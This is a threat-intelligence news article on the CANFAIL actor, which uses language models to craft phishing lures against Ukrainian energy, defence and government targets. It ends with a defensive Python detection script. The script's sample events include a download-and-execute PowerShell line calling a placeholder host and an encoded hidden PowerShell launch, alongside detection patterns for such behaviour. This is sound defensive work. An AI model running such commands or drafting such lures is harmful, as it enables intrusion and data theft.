CANFAIL: the threat actor that uses AI to expand attacks on energy, defence and governments


Google Threat Intelligence Group (GTIG) has identified an undocumented threat actor, responsible for a series of intrusions directed against Ukrainian organizations and grouped under the name CANFAIL. According to the Google team, this set of operations shows signs of a possible link with Russian intelligence services, and its main focus includes defence entities, armed forces, government agencies and energy companies at the regional and national levels.

The pattern of activity, however, is not limited to these traditional targets. GTIG notes a growing interest on the part of the operator in aerospace companies, manufacturers with ties to the military and to drone production, nuclear and chemical research centres, and international organizations involved in conflict monitoring and humanitarian aid. This range of targets reveals a broader intention: to collect sensitive intelligence with both military and civilian applications.


What differentiates CANFAIL is not necessarily its absolute technical sophistication, but its ability to compensate for limitations by means of artificial intelligence tools. The Google report explains that the group uses language models for specific tasks: to generate the texts used in its lures, to ask questions that help it set up command and control (C2) infrastructure, and to speed up the reconnaissance phase. In other words, the use of LLMs allows less experienced attackers to produce more credible lures and to accelerate operations that previously required highly specialized personnel. The full GTIG assessment is published on the official Google Cloud blog.

The phishing campaigns attributed to this actor have adopted an elementary but effective tactic: impersonating legitimate energy entities, both Ukrainian and some based in Romania, to convince recipients to open seemingly harmless documents. The messages contain links to Google Drive that lead to a RAR file; inside is a file with a double extension designed to look like a PDF (e.g. nombre.pdf.js). When opened, that obfuscated JavaScript runs a PowerShell command intended to execute a loader in memory, also through PowerShell, thus avoiding leaving artifacts on disk that would be easier to detect. While the infection takes place, the victim sees a fake dialog box with an error message, a simple tactic to minimize suspicion and gain time.

The main technical component, CANFAIL, is therefore an attack chain built to maximize the success of the deception and minimize the forensic footprint on the compromised systems. By combining JavaScript obfuscation, in-memory execution via PowerShell and visual decoys that simulate errors, the campaign seeks persistent and discreet access to mail accounts and internal resources.

In addition, GTIG links the actor to another previously attributed campaign known as PhantomCaptcha, which was described by SentinelOne researchers. That operation promoted fake pages that guided victims into triggering the infection chain and ended with the delivery of a WebSocket-based Trojan. For a wider picture of SentinelOne's research, see its research hub, SentinelLabs, where technical analyses and alerts on emerging threats are published.

A worrying aspect of these tactics is the use of language models to improve social engineering techniques. Using LLMs to write highly customized emails, to generate lists of target addresses by region and industry, or to design convincing phishing pages lowers the entry barrier for attackers with limited resources. Security institutions and teams must account for this new variable: they face not only operators with traditional tools, but also actors that amplify their effectiveness with automated text generation. European bodies and cybersecurity agencies are already analysing the impact of the malicious use of AI on cyberspace; general reports and recommendations on AI and cybersecurity risks can be consulted at the European Union Agency for Cybersecurity (ENISA).


In practical terms, what can organizations do to reduce the risk posed by a threat like CANFAIL? First, strengthen sender identity verification and the analysis of links hosted on cloud services; many campaigns use Google Drive and similar platforms to hide malicious payloads behind legitimate-looking links. Second, harden script execution policies and collect telemetry that detects PowerShell processes which download or run code in memory. Third, implement multifactor authentication and monitor abnormal access patterns on corporate email accounts. For practical guidance on mitigating phishing and initial compromises, it is worth reviewing resources from national agencies, such as US-CERT's advice on social engineering and phishing.
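The two detection opportunities described in this article, the double-extension lure (nombre.pdf.js) and a script host spawning PowerShell that downloads or evaluates code in memory, can be turned into concrete checks over endpoint telemetry. The script below is an added example written for this page, not code from GTIG, Google or the article's author. It runs over a handful of constructed Sysmon-style process-creation records (field names such as parent_image, image and command_line are an assumed, simplified schema; the host example.invalid is a reserved placeholder) and flags the events that match the behaviour the campaign is reported to exhibit, while leaving an ordinary administrative PowerShell invocation alone.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation events (Event ID 1 fields, trimmed).
# These are fabricated samples for the demonstration, not telemetry from any real incident.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # lure opened: Windows script host spawning hidden, encoded PowerShell
        "parent_image": r"C:\Windows\System32\wscript.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    },
    {   # benign administrative use: interactive shell, no download, no in-memory tricks
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -NoProfile -Command Get-Service -Name Spooler",
    },
    {   # download-and-evaluate in memory (example.invalid is a reserved placeholder host)
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "command_line": "pwsh -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')\"",
    },
    {   # unrelated process creation, must be ignored by the PowerShell rule
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
        "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "command_line": "winword.exe /n",
    },
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# A document-looking name that really ends in a script or executable extension.
DOCUMENT_EXTS = r"pdf|docx?|xlsx?|pptx?|txt|jpe?g|png"
EXECUTABLE_EXTS = r"js|jse|vbs|vbe|wsf|wsh|hta|ps1|bat|cmd|exe|scr|lnk|msi"
DOUBLE_EXTENSION_RE = re.compile(rf"\.(?:{DOCUMENT_EXTS})\.(?:{EXECUTABLE_EXTS})$", re.IGNORECASE)

# Command-line traits of PowerShell that fetches or runs code without touching disk.
IN_MEMORY_INDICATORS = [
    (re.compile(r"\s-(?:e|ec|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "in-memory evaluation"),
    (re.compile(r"downloadstring|downloaddata|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod", re.I),
     "remote payload download"),
    (re.compile(r"frombase64string", re.I), "inline base64 decoding"),
    (re.compile(r"\s-w(?:indowstyle)?\s+hidden\b", re.I), "hidden window"),
]


def basename(path: str) -> str:
    """Return the lowercase file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def is_double_extension_lure(filename: str) -> bool:
    """True when a document-looking name actually ends in an executable extension (nombre.pdf.js)."""
    return DOUBLE_EXTENSION_RE.search(basename(filename)) is not None


def analyze_event(event: Dict[str, str]) -> List[str]:
    """Return the reasons a process-creation event resembles script-host-launched, in-memory PowerShell."""
    if basename(event["image"]) not in POWERSHELL_IMAGES:
        return []
    reasons: List[str] = []
    if basename(event["parent_image"]) in SCRIPT_HOSTS:
        reasons.append("spawned by Windows script host")
    cmdline = event["command_line"]
    reasons.extend(label for pattern, label in IN_MEMORY_INDICATORS if pattern.search(cmdline))
    return reasons


def is_suspicious(reasons: List[str]) -> bool:
    """Alert on a script-host parent plus any indicator, or on two or more indicators alone."""
    from_script_host = "spawned by Windows script host" in reasons
    indicator_count = len(reasons) - (1 if from_script_host else 0)
    return (from_script_host and indicator_count >= 1) or indicator_count >= 2


def detect(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run the PowerShell rule over a batch of events and return the alerts with their reasons."""
    alerts: List[Dict[str, object]] = []
    for idx, ev in enumerate(events):
        reasons = analyze_event(ev)
        if is_suspicious(reasons):
            alerts.append({"index": idx, "image": basename(ev["image"]), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for name in ("nombre.pdf.js", "Informe_2024.pdf", "Anexo.docx.exe"):
        print(f"{name}: {'LURE' if is_double_extension_lure(name) else 'ok'}")
    for alert in detect(SAMPLE_EVENTS):
        print(f"event {alert['index']} ({alert['image']}): {', '.join(alert['reasons'])}")
```

The filename rule is cheap enough to run on mail-gateway attachment listings and on archive contents before a user ever sees them; the process rule belongs in the EDR or SIEM, where the parent/child relationship (wscript.exe spawning powershell.exe) is the strongest single signal, which is why one indicator suffices when that parent is present but two are required otherwise.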

The emergence of actors that combine conventional techniques with AI-assisted capabilities forces a change in defensive mindset: it is no longer enough to block technical exploits; more polished and automated social manipulation campaigns must be anticipated. Organizations in the orbit of the Ukrainian conflict, and those with commercial or logistical relations in the region, should increase their monitoring and implement specific controls on mail handling and the use of file-sharing tools.

In short, CANFAIL illustrates a broader trend: the democratization of offensive capabilities through automated content generation tools. Although this actor seems less sophisticated than other state-attributed groups, its adoption of LLMs and its focus on strategic targets make it a real risk to critical infrastructure and to the integrity of humanitarian and monitoring operations. Keeping up with intelligence reports and applying basic cyber hygiene controls are essential measures to complicate the work of these attackers.
